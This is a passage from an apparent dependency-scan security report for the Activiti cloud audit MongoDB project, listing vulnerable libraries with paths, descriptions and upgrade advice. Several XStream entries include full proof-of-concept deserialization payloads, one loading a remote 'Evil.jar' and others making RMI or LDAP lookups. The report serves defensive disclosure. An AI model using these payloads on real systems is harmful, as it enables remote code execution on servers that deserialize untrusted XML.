| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for io.springfox:springfox-swagger-ui.
References
medium severity
- Vulnerable module: io.springfox:springfox-swagger-ui
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0
Overview
io.springfox:springfox-swagger-ui is an Automated JSON API documentation for API's built with Spring
Affected versions of this package are vulnerable to Relative Path Overwrite (RPO). Attackers are able to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value i.e. allows the embedding of untrusted JSON data from remote servers, using <style>@import within the JSON data.
Remediation
Upgrade io.springfox:springfox-swagger-ui to version 2.10.0 or higher.
References
medium severity
- Vulnerable module: org.jboss.resteasy:resteasy-jaxrs
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
Overview
org.jboss.resteasy:resteasy-jaxrs is a JCP specification that provides a Java API for RESTful Web Services over the HTTP protocol.
Affected versions of this package are vulnerable to Information Exposure. It allows remote authenticated users to obtain sensitive information by leveraging insufficient use of random values in async jobs.
Remediation
Upgrade org.jboss.resteasy:resteasy-jaxrs to version 3.1.0.CR1 or higher.
References
medium severity
- Vulnerable module: org.mybatis:mybatis
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.activiti:activiti-engine@7-201802-EA › org.mybatis:mybatis@3.4.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.activiti:activiti-engine@7-201802-EA › org.mybatis:mybatis@3.4.2
Overview
org.mybatis:mybatis is a SQL mapper framework
Affected versions of this package are vulnerable to Remote Code Execution (RCE). It mishandles deserialization of object streams. All of the following conditions needs to be met in order to trigger RCE.
- the user enabled the built-in 2nd level cache [1]
- the user did not setup JEP-290 filter
- the attacker found a way to modify entries of the private Map field i.e.
org.apache.ibatis.cache.impl.PerpetualCache.cacheand a valid cache key
Remediation
Upgrade org.mybatis:mybatis to version 3.5.6 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the ASN1ObjectIdentifier. An attacker can cause excessive resource consumption by submitting specially crafted ASN.1 Object Identifiers, potentially leading to service disruption.
Note: This issue only applies to applications which do consume unvetted, or otherwise unvalidated, ASN.1 encodings.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper processing of large name constraint structures in PKIXCertPathReviewer. An attacker can cause excessive resource allocation by submitting specially crafted ASN.1 objects, potentially leading to service disruption.
Workaround
This vulnerability can be mitigated by limiting the size of ASN.1 objects that can be loaded from untrusted sources, thereby capping the maximum size of a Name Constraints structure.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.
PoC
<!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: -->
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>ip2</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>ip2</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.17 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
<names class='java.util.AbstractList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>0</expectedModCount>
<outer-class class='java.util.Arrays$ArrayList'>
<a class='string-array'>
<string>Evil</string>
</a>
</outer-class>
</names>
<processorCL class='java.net.URLClassLoader'>
<ucp class='sun.misc.URLClassPath'>
<urls serialization='custom'>
<unserializable-parents/>
<vector>
<default>
<capacityIncrement>0</capacityIncrement>
<elementCount>1</elementCount>
<elementData>
<url>http://127.0.0.1:80/Evil.jar</url>
</elementData>
</default>
</vector>
</urls>
<path>
<url>http://127.0.0.1:80/Evil.jar</url>
</path>
<loaders/>
<lmap/>
</ucp>
<package2certs class='concurrent-hash-map'/>
<classes/>
<defaultDomain>
<classloader class='java.net.URLClassLoader' reference='../..'/>
<principals/>
<hasAllPerm>false</hasAllPerm>
<staticPermissions>false</staticPermissions>
<key>
<outer-class reference='../..'/>
</key>
</defaultDomain>
<initialized>true</initialized>
<pdcache/>
</processorCL>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>-2147483648</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
<unserializable-parents/>
<hashtable>
<default>
<loadFactor>0.75</loadFactor>
<threshold>525</threshold>
</default>
<int>700</int>
<int>0</int>
</hashtable>
<javax.swing.UIDefaults>
<default>
<defaultLocale>zh_CN</defaultLocale>
<resourceCache/>
</default>
</javax.swing.UIDefaults>
<javax.swing.MultiUIDefaults>
<default>
<tables>
<javax.swing.UIDefaults serialization='custom'>
<unserializable-parents/>
<hashtable>
<default>
<loadFactor>0.75</loadFactor>
<threshold>525</threshold>
</default>
<int>700</int>
<int>1</int>
<sun.swing.SwingLazyValue>
<className>javax.naming.InitialContext</className>
<methodName>doLookup</methodName>
<args>
<arg>ldap://localhost:1099/CallRemoteMethod</arg>
</args>
</sun.swing.SwingLazyValue>
</hashtable>
<javax.swing.UIDefaults>
<default>
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
<resourceCache/>
</default>
</javax.swing.UIDefaults>
</javax.swing.UIDefaults>
</tables>
</default>
</javax.swing.MultiUIDefaults>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
